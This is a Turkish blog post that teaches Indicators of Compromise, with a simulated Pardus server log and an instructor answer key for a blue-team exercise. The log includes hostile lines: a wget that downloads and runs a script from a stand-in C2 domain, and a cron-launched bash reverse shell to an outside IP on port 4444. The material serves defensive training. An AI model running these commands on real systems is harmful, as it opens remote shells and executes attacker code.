Uzlaşma Göstergeleri (IOC) Nedir? Siber Güvenlikte Dijital Delil Avı

-

Siber olaylara müdahale (Incident Response) ve tehdit avcılığının (Threat Hunting) temel yapı taşlarından biri olan Uzlaşma Göstergeleri (IOC - Indicator of Compromise), bir sistemin veya ağın siber saldırıya uğradığını kanıtlayan dijital izlerdir.

Fiziksel dünyada bir hırsızlık yaşandığında olay yeri inceleme ekipleri parmak izi, kırık bir cam veya bir araç lastik izi arar. Siber güvenlik dünyasında ise bu kanıtlara Uzlaşma Göstergesi (IOC - Indicator of Compromise) adı verilir.

IOC'ler, bir bilgisayar ağında yetkisiz bir erişim, zararlı yazılım (malware) bulaşması veya veri ihlali yaşandığına dair somut deliller sağlayan dijital işaretlerdir. Bir sistemin güvenliğinin ihlal edildiğini ("compromised") gösterirler.

IOC'ler Neden Önemlidir?

Bir saldırıyı gerçekleşmeden önce durdurmak (Önleme) en ideal senaryodur. Ancak günümüzdeki karmaşık tehdit ortamında saldırganlar sıklıkla içeri sızmayı başarır. Bu noktada IOC'ler şu işlevleri yerine getirir:

  • Erken Tehdit Tespiti: Sistemde sessizce ilerlemeye çalışan bir zararlı yazılımın ağ trafiği veya dosya kalıntıları sayesinde erkenden fark edilmesini sağlar.

  • Olay Müdahalesi (Incident Response): Bir saldırı gerçekleştiğinde, olayın boyutunu, hangi sistemlerin etkilendiğini ve saldırganın hangi yöntemleri kullandığını belirlemek için temel rehberdir.

  • Bilgi Paylaşımı: Bir kurum saldırıya uğradığında tespit ettiği IOC'leri (örneğin kötü amaçlı bir IP adresini) diğer kurumlarla paylaşarak, onların aynı saldırıyı önceden engellemesini sağlar.

Yaygın IOC Türleri

Saldırganlar sistemde ilerlerken farklı seviyelerde izler bırakırlar. Bu izleri tespit etme zorluğuna göre sınıflandırabiliriz:

IOC TürüAçıklamaÖrnek Durum
Dosya Hash DeğerleriZararlı yazılımların dijital parmak izleridir (MD5, SHA-256).Antivirüsün e3b0c44298fc1c149afbf4c8996fb hash değerine sahip bir dosyayı engellemesi.
IP AdresleriSaldırganın komuta kontrol (C2) sunucularına ait IP adresleri.Sunucunun gece yarısı bilinen zararlı bir IP adresine (ör: 192.168.100.50) veri göndermesi.
Domain (Alan Adları)Oltalama (Phishing) veya zararlı yazılım indirme siteleri.Kullanıcıların secure-login-update[.]com gibi sahte bir adrese yönlendirilmesi.
Ağ Trafiği AnormallikleriNormal dışı port kullanımı veya yüksek boyutta veri çıkışı.DNS (Port 53) üzerinden gigabaytlarca veri transferi yapılması (DNS Tunneling).
Kayıt Defteri (Registry)Zararlı yazılımın sistem her açıldığında çalışmak için yaptığı ayarlar.Windows Run veya RunOnce anahtarlarına şüpheli bir .exe dosyasının eklenmesi.
Kullanıcı DavranışlarıEle geçirilmiş hesaplarla yapılan sıra dışı işlemler.Bir kullanıcının aynı anda 5 farklı ülkeden giriş yapmayı denemesi.

Log Analizinde ve Savunma Senaryolarında IOC Kullanımı

Özellikle Mavi Takım (Blue Team) operasyonlarında ve log (kayıt) analizinde IOC'ler en kritik silahlardır. Güvenlik Bilgi ve Olay Yönetimi (SIEM) sistemleri, güvenlik duvarlarından (Firewall), sunuculardan ve işletim sistemlerinden gelen milyonlarca satır logu toplar.

Ekipler, bilinen tehditlere ait IOC'leri bu SIEM sistemlerine kural olarak eklerler. Örneğin; "Eğer herhangi bir istemci (client) makinesi, X numaralı zararlı IP adresiyle bağlantı kurmaya çalışırsa alarm üret" şeklinde bir kural, ağdaki bir bilgisayarın siber saldırganların kontrolüne geçtiğini anında tespit edebilir.

Sonuç

IOC'leri doğru okumak ve analiz etmek, bir güvenlik ihlalinin kök nedenini (root cause) bulmanın ilk adımıdır. Saldırganlar IP adreslerini veya domainleri kolayca değiştirebilirler, ancak sistemdeki anormal davranış kalıplarını (gece 03:00'te yetki yükseltme denemeleri gibi) gizlemeleri çok daha zordur. Bu nedenle başarılı bir siber güvenlik savunması, IOC'lerin sürekli olarak güncellenmesi ve loglar üzerinde dikkatle avlanmasına dayanır. 

Bir Mavi Takım senaryosu! Öğrencilerin siber güvenlik kaslarını geliştirebileceği, "Büyük Final" tatbikatlarında kullanılabilecek, dışa açık bir Pardus sunucusundan alınmış simüle edilmiş bir log dosyası hazırladım.

Bu örnekte, auth.log (kimlik doğrulama kayıtları) ve syslog (sistem olayları) kayıtları birleştirilmiş bir zaman çizelgesinde sunulmaktadır.

Senaryo: "Şüpheli Sunucu Trafiği"

Ağdaki izleme sistemleri, pardus-server isimli makineden dışarıya doğru anormal bir trafik çıkışı tespit etti. Mavi takım analisti olarak göreviniz, aşağıdaki log kayıtlarını inceleyerek saldırganın sisteme nasıl girdiğini, neler yaptığını ve hangi IOC'leri (Uzlaşma Göstergeleri) bıraktığını tespit etmektir.

Plaintext:
May 22 14:10:01 pardus-server sshd[10212]: Failed password for root from 192.168.10.45 port 44322 ssh2
May 22 14:15:22 pardus-server sshd[10245]: Failed password for admin from 185.199.108.153 port 51234 ssh2
May 22 14:15:25 pardus-server sshd[10245]: Failed password for admin from 185.199.108.153 port 51234 ssh2
May 22 14:15:28 pardus-server sshd[10245]: Failed password for admin from 185.199.108.153 port 51234 ssh2
May 22 14:15:32 pardus-server sshd[10245]: Accepted password for admin from 185.199.108.153 port 51234 ssh2
May 22 14:15:32 pardus-server sshd[10245]: pam_unix(sshd:session): session opened for user admin by (uid=0)
May 22 14:16:05 pardus-server sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt-get update
May 22 14:18:12 pardus-server sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/wget http://evil-c2-server[.]xyz/update_script.sh -O /tmp/update.sh
May 22 14:18:15 pardus-server sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/chmod +x /tmp/update.sh
May 22 14:18:20 pardus-server sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/tmp/update.sh
May 22 14:19:01 pardus-server CRON[10390]: (root) CMD (/bin/bash -c 'bash -i >& /dev/tcp/185.199.108.153/4444 0>&1')

Eğitmen / Mavi Takım Çözüm Anahtarı

Öğrenciler veya analistler bu logları incelerken şu adımları ve IOC'leri yakalamalıdır:

1. Kaba Kuvvet (Brute Force) Saldırısı Tespiti

  • Olay: 14:15:22 ile 14:15:28 arasında aynı IP adresinden peş peşe başarısız SSH giriş denemeleri yapılıyor.

  • Tespit Edilen IOC (Saldırgan IP): 185.199.108.153

2. İhlalin Gerçekleşmesi (Compromise)

  • Olay: 14:15:32'de saldırgan doğru şifreyi tahmin ediyor (veya oltalama ile elde ettiği şifreyi kullanıyor) ve Accepted password mesajı düşüyor.

  • Etkilenen Hesap: admin kullanıcısının parolası ele geçirilmiş.

3. Zararlı Yazılım İndirme ve Çalıştırma

  • Olay: 14:18:12'de saldırgan yetkilerini (sudo) kullanarak dışarıdaki bir sunucudan dosya indiriyor, yetkilendiriyor ve çalıştırıyor. Normal bir sistem güncellemesi gibi görünmesi için dosya adını update_script.sh yapmış.

  • Tespit Edilen IOC (Zararlı Alan Adı / URL): http://evil-c2-server[.]xyz/update_script.sh

  • Tespit Edilen IOC (Dosya Yolu): /tmp/update.sh (Saldırganlar iz bırakmamak veya yetki kısıtlamalarına takılmamak için sıklıkla geçici klasör olan /tmp dizinini kullanırlar).

4. Kalıcılık Sağlama (Persistence) ve Komuta Kontrol (C2)

  • Olay: 14:19:01'de saldırgan, sistem yeniden başlasa bile erişimini kaybetmemek için CRON (Zamanlanmış görevler) üzerinden bir Reverse Shell (Ters Bağlantı) başlatıyor. Bu komut, sunucunun saldırganın makinesine 4444 numaralı porttan bağlanmasını sağlıyor.

  • Tespit Edilen Davranışsal IOC: Cron ile bash -i (interaktif shell) başlatılması ve 185.199.108.153 IP'sine 4444 portundan bağlantı açılması.

Bu log analizi simülasyonu; öğrencilere sadece bir IP'yi engellemeyi değil, saldırganın adım adım sistemde nasıl yatay hareket ettiğini (lateral movement) ve kalıcılık sağladığını okumayı öğretecektir.

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Android Telefon/Tablet Ekranını Pardus ETAP 23 Yüklü Akıllı Tahtaya Yansıtma

-
Resim
Bu eğitim, öğretmenlerin Android tablet veya telefonlarının ekranını kolayca tahta ekranına yansıtmaları için gereken tüm yöntemler ayrıntılı şekilde anlatılmaktadır. 1. Giriş Android cihazı akıllı tahtaya yansıtmanın amacı: Dersi telefondan yönetmek Mobil uygulamaları sınıfa göstermek YouTube, EBA, PDF, görsel veya kamera görüntüsünü aktarmak Kablosuz sunum yapmak Pardus ETAP 23 üzerinde yansıtma işlemi için en çok tercih edilen yöntemler: Scrcpy (USB + WiFi bağlantılı) — En stabil çözüm Third-party çözümler (TeamViewer Host, DeskScreen, Vysor vb.) Bu makalede en garantili ve ETAP 23’e en uyumlu yöntem olan Scrcpy başta olmak üzere tüm yöntemleri anlatıyoruz. 2. Scrcpy ile Yansıtma Scrcpy, Android cihazınızı yüksek kalite / düşük gecikme ile bilgisayara aktaran açık kaynaklı bir yazılımdır. Pardus ETAP 23 için mükemmel uyumludur. ✔️ 2.1. Kurulum Adım 1 — Gerekli paketleri yükle Terminali açın: sudo apt update sudo apt install scrcpy adb android-to...
Devamı

Pardus Etap 23’de Unutulmuş Etap Yetkili Parolasını Sıfırlama

-
Resim
Bu kısa eğitimde, Pardus sisteminde unutulmuş bir Etap Yetkli parolasının nasıl sıfırlanacağını öğreneceksiniz. Bu, etapadmin kullanıcısı olarak oturum açma ve yönetim görevlerini gerçekleştirme yeteneğinizi yeniden kazanmanıza yardımcı olacaktır. Öncelikle Pardus sisteminizi açın veya yeniden başlatın. Aşağıda gösterildiği gibi bir GRUB menüsüyle karşılaşacaksınız. İlk seçenekte devam edin ve sistem başlatılmadan önce klavyedeki " e " tuşuna basın. . Bu sizi aşağıda gösterilen ekrana yönlendirecektir. Aşağı kaydırın ve /boot/vmlinuz-* bölümünden önce gelen ve UUID 'yi de belirten ' linux ' ile başlayan satırı bulun.   İmleci bu satırın sonuna götürün ve ‘ ro quiet’ bölümünden hemen sonrasına getirin ve init=/bin/bash. parametresini ekleyin Ardından, kök dosya sistemini salt okunur (ro) erişim haklarıyla bağlayarak tek kullanıcı modunda önyüklemeyi etkinleştirmek için Ctrl + x tuşlarına basın. Parolayı sıfırlamak için erişim hakkını salt okunurdan okuma-ya...
Devamı

Pardus Etap 23 Yazıcı Kurulumu

-
Resim
1. CUPS Nedir? CUPS , "Common UNIX Printing System" (Yaygın UNIX Yazdırma Sistemi) kelimelerinin baş harflerinden oluşur.  Temel Görevi: Pardus gibi UNIX tabanlı işletim sistemleri için standart yazdırma sunucusudur. Bilgisayarınızdaki uygulamalardan (LibreOffice, tarayıcı vb.) gelen yazdırma isteklerini alır, bunları yazıcının anlayacağı dile (genellikle PCL veya PostScript) çevirir ve sıraya koyarak yazıcıya gönderir. Geliştirici: İlk olarak Michael Sweet tarafından geliştirildi, daha sonra Apple Inc. tarafından desteklendi ve günümüzde OpenPrinting topluluğu tarafından sürdürülüyor. Ağ Paylaşımı: CUPS'ın en güçlü yanlarından biri, bir yazıcıyı ağdaki diğer bilgisayarlara (Windows, macOS veya başka bir Linux) kolayca paylaştırabilmesidir. Yönetim Arayüzü: En karmaşık ayarları bile yapabilmenizi sağlayan, tarayıcı üzerinden çalışan yerel bir web arayüzüne sahiptir ( http://localhost:631 ). Pardus, Debian tabanlı olduğu için CUPS'ı varsayılan yazdırma sistemi ol...
Devamı